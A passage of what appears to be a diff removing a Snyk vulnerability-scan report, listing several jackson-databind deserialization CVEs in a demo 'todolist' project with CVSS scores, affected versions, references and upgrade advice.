2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n- [GitHub Release Notes](https://github.com/FasterXML/jackson-databind/blob/a066415d66a6b1a4688ff0ed25695aa3a86ac130/release-notes/VERSION-2.x)\n", - "epssDetails": { - "percentile": "0.85805", - "probability": "0.01269", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-14719" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-4gq5-ch57-c2mg" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:23:45.326350Z", - "functions_new": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-07-27T17:22:45Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-10-11T17:22:38Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:21.823657Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72451", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.7)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2097", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", - "cvssV3BaseScore": 10, - "modificationTime": "2024-03-11T09:46:43.143163Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", - "cvssV3BaseScore": 6.8, - "modificationTime": "2024-03-11T09:51:21.774444Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:20.565013Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 10, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:43.143163Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 6.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:51:21.774444Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A malicious user could perform a SSRF attack via the `axis2-jaxws` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14721`) is not identical to `CVE-2018-12018`, `CVE-2018-14719`, `CVE-2018-14720`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", - "epssDetails": { - "percentile": "0.85710", - "probability": "0.01257", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-14721" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-9mxf-g3x6-wv74" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:25:40.161831Z", - "functions_new": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-07-27T17:24:46Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-10-11T17:24:39Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:21.774444Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72882", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Wuguixiong" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0, 2.9.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2186", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", - "title": "GitHub Release Tag" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:06.100058Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:51:22.043196Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:46.690019Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:06.100058Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:51:22.043196Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `jboss-common-core ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19362`) is not identical to `CVE-2018-19360` and `CVE-2018-19361`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", - "epssDetails": { - "percentile": "0.81590", - "probability": "0.00788", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-19362" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-c8hm-7hpq-7jhg" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-01-03T14:17:19.256477Z", - "functions_new": [ - { - "version": [ - "[2.0.0, 2.9.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-01-02T19:18:44Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-01-03T17:01:51Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:22.043196Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72883", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Wuguixiong" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0, 2.9.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2186", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", - "title": "GitHub Release Tag" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:04.422288Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:48:34.457712Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:20.593938Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:04.422288Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:34.457712Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `axis2-transport-jms ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19360`) is not identical to `CVE-2018-19362` and `CVE-2018-19361`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", - "epssDetails": { - "percentile": "0.81590", - "probability": "0.00788", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-19360" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-f9hv-mg5h-xcw9" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-01-03T14:17:23.673097Z", - "functions_new": [ - { - "version": [ - "[2.0.0, 2.9.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-01-02T19:18:44Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-01-03T17:01:51Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:34.457712Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72884", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Wuguixiong" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0, 2.9.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2186", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", - "title": "GitHub Release Tag" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:06.110184Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:51:22.091904Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:20.548577Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:06.110184Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:51:22.091904Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `axis2-transport-jms ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19361`) is not identical to `CVE-2018-19362` and `CVE-2018-19360`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", - "epssDetails": { - "percentile": "0.81590", - "probability": "0.00788", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-19361" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-mx9v-gmh4-mgqw" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-01-03T14:17:31.715185Z", - "functions_new": [ - { - "version": [ - "[2.0.0, 2.9.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-01-02T19:18:43Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": 